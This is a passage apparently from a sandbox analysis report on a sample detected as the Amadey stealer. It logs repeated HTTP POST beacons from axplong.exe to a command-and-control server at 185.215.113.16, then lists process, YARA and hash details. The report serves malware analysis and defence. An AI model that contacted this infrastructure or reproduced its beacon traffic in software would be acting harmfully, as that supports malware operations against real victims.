Sep 26, 2024 18:29:57.803634882 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:58.032550097 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	49770	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:58.144578934 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:58.841969013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:58.843313932 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:59.069298029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	49771	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:59.190507889 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:59.910819054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:59.911952972 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:30:00.151271105 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	49772	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:00.279174089 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:30:01.011519909 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:30:01.015243053 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:30:01.248735905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	49773	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:01.362713099 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:30:02.074484110 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:30:02.075826883 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:30:02.313857079 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	49774	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:02.427949905 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:30:03.158406973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	49775	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:03.167258978 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:30:03.871732950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	49776	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:03.991398096 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:30:04.689481020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	49778	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:04.698847055 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:30:05.413382053 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	49779	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:05.537329912 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:30:06.278338909 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	49780	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:06.288217068 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:30:07.007134914 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	49781	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:07.130489111 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:30:07.867284060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	49782	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:07.884569883 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:30:08.591595888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	49783	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:08.711709023 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:30:09.420989990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:30:09.428148985 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:30:09.657274008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	49784	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:30:09.772277117 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:30:10.498146057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:30:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Target ID:	0
Start time:	12:28:04
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xd70000
File size:	1'870'848 bytes
MD5 hash:	A3A83347AE8FCDEE6EC20F6BA13311C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2262535378.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2219847128.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:28:07
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x220000
File size:	1'870'848 bytes
MD5 hash:	A3A83347AE8FCDEE6EC20F6BA13311C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2288200287.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2247936497.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:29:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x220000
File size:	1'870'848 bytes
MD5 hash:	A3A83347AE8FCDEE6EC20F6BA13311C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2769975367.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 051401BA Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df72378fa504d24db0e5dae29d00b2f39e98654f843485e0dfd6ff10924f82bd
Instruction ID: ee803083c14e51abb9cbf65da76b0fc77cebf5eba05e324754c4406bd9e2c914
Opcode Fuzzy Hash: df72378fa504d24db0e5dae29d00b2f39e98654f843485e0dfd6ff10924f82bd
Instruction Fuzzy Hash: 7F21A1EB048124BEA126D5836A0CEF67E3FE6CB630332942BF507D9442E3D41E0DA971

Function 051401C7 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8445ff25b1276e280ed3199450a04866ec5b28caa146f6231a9c4968be409637
Instruction ID: 7d08470f0e5b4dbb6d2f55c8c54a73b783642ce35ca94887ff9af002e04b11f0
Opcode Fuzzy Hash: 8445ff25b1276e280ed3199450a04866ec5b28caa146f6231a9c4968be409637
Instruction Fuzzy Hash: 2B21E1EB088124BEA116D5826A1CDF67F7EE6CB730332A426F546DD442E3D44E0EA971

Function 0514022A Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2264599704.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5140000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdef59d864b43b6e9423bc21c2880f558e973e004a35f7b2aa008977bcc41366
Instruction ID: 26275a09f41035aa09ae8f9b62ac83f300c33dcd7f579d016a802d29c7d62a43
Opcode Fuzzy Hash: fdef59d864b43b6e9423bc21c2880f558e973e004a35f7b2aa008977bcc41366
Instruction Fuzzy Hash: 5601D6AB048024BF655AD983661CDFA7F3AE6CF330731A426F6479C442E3941E0DAA31

Function 0514025A Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

